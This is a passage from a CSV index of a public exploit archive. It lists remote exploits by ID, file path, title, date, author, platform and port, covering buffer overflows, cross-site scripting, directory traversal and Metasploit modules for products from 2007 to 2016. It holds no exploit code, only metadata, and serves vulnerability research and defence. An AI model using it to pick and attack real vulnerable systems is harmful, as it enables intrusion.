Escalation",2007-08-15,"John Heasman",java,remote, -30507,exploits/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote, -30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote, -30521,exploits/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",multiple,remote, -30523,exploits/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",multiple,remote, -30532,exploits/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal",2007-08-27,titon,windows,remote, -30535,exploits/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning (1)",2007-08-27,"Amit Klein",linux,remote, -30536,exploits/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",linux,remote, -30537,exploits/windows/remote/30537.txt,"Microsoft MSN Messenger 8.0 - Video Conversation Buffer Overflow",2007-08-28,wushi,windows,remote, -30543,exploits/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote, -30971,exploits/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote, -30972,exploits/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote, -30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote, -31024,exploits/hardware/remote/31024.txt,"F5 BIG-IP 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote, -30882,exploits/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - 'URL' Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote, -30883,exploits/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",windows,remote, -30562,exploits/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,anonymous,windows,remote, -30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,windows,remote, -30567,exploits/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote, -30569,exploits/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",windows,remote, -32417,exploits/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote, -32416,exploits/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote, -32512,exploits/unix/remote/32512.rb,"FreePBX - 'config.php' Remote Code Execution (Metasploit)",2014-03-25,Metasploit,unix,remote, -32399,exploits/unix/remote/32399.txt,"Multiple Vendor FTP Server - Long Command Handling Security",2008-09-20,"Maksymilian Arciemowicz",unix,remote, -32393,exploits/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",solaris,remote, -32391,exploits/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote, -33141,exploits/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443 -32390,exploits/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote, -32277,exploits/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Overflow",2014-03-15,sorbo,lin_x86-64,remote, -30582,exploits/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote, -30589,exploits/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote, -30600,exploits/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote, -30622,exploits/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload",2007-09-27,"Ronald van den Heetkamp",windows,remote, -30627,exploits/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,remote, -30630,exploits/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",multiple,remote, -30631,exploits/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - 'IE' Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote, -30635,exploits/windows/remote/30635.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote, -30636,exploits/windows/remote/30636.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote, -30643,exploits/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,remote, -30645,exploits/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote, -30650,exploits/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",hardware,remote, -30652,exploits/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote, -30673,exploits/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote, -30677,exploits/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote, -30678,exploits/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote, -30692,exploits/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote, -30711,exploits/linux/remote/30711.txt,"Shttp 0.0.x - Directory Traversal",2007-10-25,"Pete Foster",linux,remote, -30720,exploits/windows/remote/30720.html,"GlobalLink 2.7.0.8 - ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow",2007-10-29,anonymous,windows,remote, -30728,exploits/linux/remote/30728.txt,"Yarssr 0.2.2 - GUI.PM Remote Code Injection",2007-10-31,"Duncan Gilmore",linux,remote, -30729,exploits/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console - URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote, -30730,exploits/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote, -30736,exploits/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",linux,remote, -30740,exploits/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 - Login procedure Authentication Bypass",2007-11-05,"David Smith",hardware,remote, -30742,exploits/multiple/remote/30742.txt,"OpenBase 10.0.x - Remote Buffer Overflow / Remote Command Execution",2007-11-05,"Kevin Finisterre",multiple,remote, -30755,exploits/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting",2007-11-12,"Jan Fry",hardware,remote, -30768,exploits/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote, -30771,exploits/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote, -30772,exploits/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote, -30781,exploits/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote, -31026,exploits/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote, -30787,exploits/php/remote/30787.rb,"vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,php,remote,80 -30816,exploits/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 - File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,windows,remote, -30819,exploits/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare - Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,windows,remote, -30833,exploits/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - 'My.Logon.php3' Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote, -30834,exploits/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote, -30835,exploits/unix/remote/30835.sh,"Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting",2007-11-30,"Adrian Pastor",unix,remote, -30838,exploits/multiple/remote/30838.html,"Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filterings",2007-12-01,"Carl Hardwick",multiple,remote, -30850,exploits/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",multiple,remote, -30897,exploits/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution",2007-12-17,rgod,windows,remote, -30901,exploits/windows/remote/30901.txt,"Apache 2.2.6 (Windows) - Share PHP File Extension Mapping Information Disclosure",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote, -30905,exploits/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x - 'main.swf?baseurl' asfunction: Protocol Handler Cross-Site Scripting",2007-12-18,"Rich Cannings",multiple,remote, -30907,exploits/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x - ActiveX Control 'navigateToURL' API Cross Domain Scripting",2007-12-18,"Adam Barth",linux,remote, -30908,exploits/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote, -30915,exploits/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,hardware,remote,32764 -30920,exploits/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote, -30928,exploits/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote, -30933,exploits/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote, -30935,exploits/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote, -30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote, -30944,exploits/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote, -30998,exploits/linux/remote/30998.py,"SynCE 0.92 - 'vdccm' Daemon Remote Command Injection",2008-01-07,"Alfredo Ortega",linux,remote, -31010,exploits/multiple/remote/31010.sql,"Oracle Database 10 g - XML DB xdb.xdb_pitrig_pkg Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote, -31013,exploits/hardware/remote/31013.txt,"2WIRE Routers - Cross-Site Request Forgery",2008-01-15,hkm,hardware,remote, -31023,exploits/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,windows,remote, -31031,exploits/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 - URI SecURIty Bypass",2008-01-16,nnposter,hardware,remote, -31032,exploits/windows/remote/31032.txt,"BitTorrent 6.0 / uTorrent 1.6/1.7 - Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote, -31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,remote,80 -31039,exploits/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote, -31040,exploits/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote, -31046,exploits/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Remote Buffer Overflow",2008-01-09,Knell,windows,remote, -31047,exploits/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote, -31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote, -31051,exploits/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote, -31052,exploits/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote, -31053,exploits/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote, -31056,exploits/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote, -40358,exploits/linux/remote/40358.py,"LamaHub 0.0.6.2 - Remote Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111 -31072,exploits/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote, -31076,exploits/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",linux,remote, -31078,exploits/hardware/remote/31078.txt,"2WIRE Routers - 'H04_POST' Access Validation",2008-01-30,"Oligarchy Oligarchy",hardware,remote, -31095,exploits/novell/remote/31095.txt,"Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote, -31106,exploits/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Remote Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",multiple,remote, -31113,exploits/windows/remote/31113.html,"GlobalLink 2.6.1.2 - 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote, -31118,exploits/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote, -31119,exploits/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Multiple Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote, -31127,exploits/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote, -31130,exploits/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote, -31132,exploits/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote, -31133,exploits/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote, -31149,exploits/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote, -31163,exploits/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote, -40760,exploits/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote, -31683,exploits/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote, -31179,exploits/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Remote Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote, -31181,exploits/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555 -31204,exploits/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote, -31231,exploits/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote, -31253,exploits/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Arbitrary Code Execution",2014-01-29,Mekanismen,jsp,remote,80 -31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 -31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 -31462,exploits/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote, -31260,exploits/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 -31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,php,remote,80 -31279,exploits/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",multiple,remote, -31298,exploits/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Cross-Site Scripting",2008-02-25,nnposter,hardware,remote, -31309,exploits/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - 'zseticcspace()' Remote Buffer Overflow",2008-02-27,"Will Drewry",linux,remote, -31311,exploits/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting",2008-02-28,"Richard Brain",hardware,remote, -31340,exploits/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting",2008-03-06,"Henri Lindberg",hardware,remote, -31342,exploits/hardware/remote/31342.txt,"Airspan ProST WiMAX Device - Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote, -31345,exploits/windows/remote/31345.txt,"Microworld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",windows,remote, -31359,exploits/windows/remote/31359.html,"Microsoft Internet Explorer 7 - Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",windows,remote, -31362,exploits/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross-Site Scripting",2008-03-07,NetJackal,multiple,remote, -31364,exploits/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Console HTML Injection",2008-03-08,nnposter,hardware,remote, -31395,exploits/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting",2008-03-12,felix,windows,remote, -31396,exploits/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure",2008-03-12,julien.cayzac,linux,remote, -31698,exploits/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote, -31699,exploits/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - Open Redirection",2008-04-23,"Richard Brain",windows,remote, -31405,exploits/windows/remote/31405.c,"XnView 1.92.1 - Command-Line Arguments Buffer Overflow",2014-02-05,"Sylvain THUAL",windows,remote, -31407,exploits/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote, -31409,exploits/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote, -31412,exploits/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote, -31432,exploits/linux/remote/31432.rb,"Skybluecanvas CMS - Remote Code Execution (Metasploit)",2014-02-05,Metasploit,linux,remote, -31433,exploits/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution (Metasploit)",2014-02-05,Metasploit,multiple,remote,80 -31434,exploits/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution (Metasploit)",2014-02-05,Metasploit,java,remote,8080 -31473,exploits/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote, -31474,exploits/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote, -31479,exploits/php/remote/31479.txt,"Quick Classifieds 1.0 - 'index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,remote, -40354,exploits/android/remote/40354.txt,"Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote, -31518,exploits/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023 -31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote, -31533,exploits/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command",2008-03-25,"Nicholas Gregorie",novell,remote, -31534,exploits/windows/remote/31534.html,"LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite",2008-03-25,shinnai,windows,remote, -31536,exploits/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote, -31540,exploits/linux/remote/31540.php,"PECL 3.0.x - Alternative PHP Cache Extension 'apc_search_paths()' Remote Buffer Overflow",2008-03-26,dannyp,linux,remote, -31551,exploits/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Disclosure",2005-10-14,"security curmudgeon",multiple,remote, -31562,exploits/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote, -31575,exploits/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit)",2014-02-11,Metasploit,windows,remote, -31577,exploits/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution (Metasploit)",2014-02-11,Metasploit,unix,remote,7778 -31583,exploits/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure",2008-03-31,"Alexander Klink",windows,remote, -31591,exploits/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal",2008-04-02,"Luigi Auriemma",linux,remote, -31613,exploits/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Integer Overflow",2008-04-21,"Core Security Technologies",osx,remote, -31624,exploits/windows/remote/31624.txt,"Microsoft Internet Explorer 7 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",windows,remote, -31630,exploits/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - '.SWF' File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote, -31632,exploits/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote, -31634,exploits/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote, -31638,exploits/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe?Action' Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote, -31639,exploits/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote, -31917,exploits/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090 -31689,exploits/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 -31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote, -31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote, -31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote, -31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 -31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,windows,remote, -31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote, -31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote, -31758,exploits/hardware/remote/31758.py,"WRT120N 1.0.0.7 - Remote Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80 -31759,exploits/windows/remote/31759.txt,"Microsoft Internet Explorer 2 - UTF-7 HTTP Response Handling",2008-05-08,"Yaniv Miron",windows,remote, -31767,exploits/multiple/remote/31767.rb,"MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)",2014-02-19,Metasploit,multiple,remote,80 -31769,exploits/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,windows,remote, -31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote, -31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution",2014-02-20,"Julien Ahrens",windows,remote, -31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,windows,remote,21 -31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-22,"OJ Reeves",windows,remote, -31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",unix,remote, -31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",hardware,remote, -31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",windows,remote,30000 -31853,exploits/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0/12.0/12.1 - Remote Command Execution",2014-02-23,"Chris Graham",windows,remote, -31862,exploits/hardware/remote/31862.txt,"Xerox DocuShare 6 - dsdn/dsweb/SearchResults URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote, -31863,exploits/hardware/remote/31863.txt,"Xerox DocuShare 6 - dsdn/dsweb/Services/User 